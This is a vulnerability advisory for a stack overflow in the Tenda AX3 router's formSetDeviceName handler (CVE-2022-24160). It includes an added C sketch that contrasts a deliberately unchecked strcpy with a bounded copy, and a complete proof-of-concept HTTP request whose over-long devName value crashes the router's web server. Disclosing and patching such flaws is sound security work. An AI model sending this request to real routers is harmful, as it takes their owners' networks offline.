CVE-2022-24160: my_vuln/32.md at main · pjqwudi/my_vuln

Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function formSetDeviceName. This vulnerability allows attackers to cause a Denial of Service (DoS) via the devName parameter.


Tenda Vulnerability

Vendor: Tenda

Product: AX3

Version: V16.03.12.10_CN (Download link: https://www.tenda.com.cn/download/detail-3238.html)

Type: Stack Overflow

Author: Jiaqian Peng

Institution: [email protected]

Vulnerability description

We found a stack overflow vulnerability in a Tenda router running recently released firmware. It allows a remote attacker who can reach the web interface to crash the router's web server (httpd).

Stack Overflow

In the httpd binary:

In the formSetDeviceName function, the devName parameter is taken directly from the attacker-controlled request. If the value is too long it overflows a stack buffer, so by controlling devName an attacker can overwrite what lies beyond that buffer, which in principle includes the data needed for arbitrary code execution; the PoC below demonstrates only the crash.

The input is not length-checked. In the set_device_name function, devName is copied directly into a fixed-size local variable on the stack; an over-long value runs past the buffer and overwrites the saved return address of the function, which is the stack buffer overflow.

Supplement

To avoid problems of this kind, the length and content of the string should be validated where the parameter is extracted from the request, before it is copied anywhere.

The mac parameter does not cause a buffer overflow, because the function lower_mac limits its length to 20.
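The following C model, added here as an illustration rather than code from the advisory or from the Tenda firmware, puts the unchecked-copy pattern described for set_device_name next to a bounded version that applies the same kind of limit the advisory attributes to lower_mac. The buffer size DEVNAME_MAX, the function names and the sample inputs are assumptions; the page does not give the real buffer size.

```c
/* Added example, not the advisory's or the vendor's code. Models the
 * unchecked strcpy into a stack buffer (vulnerable) beside a bounded
 * copy with an explicit length check (hardened). */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define DEVNAME_MAX 64   /* assumed stack buffer size; the real size is not on the page */
#define MAC_MAX     20   /* the limit the advisory says lower_mac enforces on mac */

/* Vulnerable pattern: devName is copied into a fixed-size stack buffer with
 * no length check, so a value of DEVNAME_MAX bytes or more runs past the
 * buffer into saved registers and the return address. Shown for contrast;
 * never call it with untrusted input. */
void set_device_name_vuln(const char *devName)
{
    char local[DEVNAME_MAX];
    strcpy(local, devName);   /* unbounded copy: this is the overflow */
    printf("device name set to %s\n", local);
}

/* Hardened form: measure the input against the destination first and
 * reject anything that does not fit with its terminator. Returns 0 on
 * success, -1 if the input was rejected (no silent truncation). */
int set_device_name_safe(const char *devName, char *out, size_t out_size)
{
    size_t n = strnlen(devName, out_size);   /* never scans past out_size */
    if (n >= out_size)
        return -1;
    memcpy(out, devName, n);
    out[n] = '\0';
    return 0;
}

/* Caller-side check: would this value overflow a buffer of buf_size bytes? */
int would_overflow(const char *value, size_t buf_size)
{
    return strnlen(value, buf_size) >= buf_size;
}

/* Same idea for mac, mirroring the 20-byte limit the advisory mentions. */
int mac_length_ok(const char *mac)
{
    return strnlen(mac, MAC_MAX + 1) <= MAC_MAX;
}

/* Constructed sample input standing in for the PoC's long devName value. */
const char *sample_long_devname(void)
{
    static char name[300];
    memset(name, 'a', sizeof name - 1);
    name[sizeof name - 1] = '\0';
    return name;
}

int main(void)
{
    char buf[DEVNAME_MAX];
    printf("short name: %s\n",
           set_device_name_safe("office-ap", buf, sizeof buf) == 0 ? "accepted" : "rejected");
    printf("long name:  %s\n",
           set_device_name_safe(sample_long_devname(), buf, sizeof buf) == 0 ? "accepted" : "rejected");
    printf("mac ok:     %d\n", mac_length_ok("e0:be:03:25:12:36"));
    return 0;
}
```

The check in set_device_name_safe belongs at the point where the parameter is pulled out of the request, which is where the advisory recommends validating it; rejecting over-long input there means every later consumer of devName can rely on the bound.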

In the libcommonprod.so binary:

PoC

Setting devName to a long run of "a" characters (aaaaaaaaaaaaa...) crashes the router, for example with the request below.

Note that the submitted string needs to contain \r; otherwise the vulnerability is not triggered.

POST /goform/SetOnlineDevName HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 330
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/parental_control.html?random=0.6900448104060756&
Cookie: password=f5bb0c8de146c67b44babbf4e6584cc0smscvb

devName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&mac=e0:be:03:25:12:36

Result

The target router's httpd crashes and the router stops serving requests correctly.
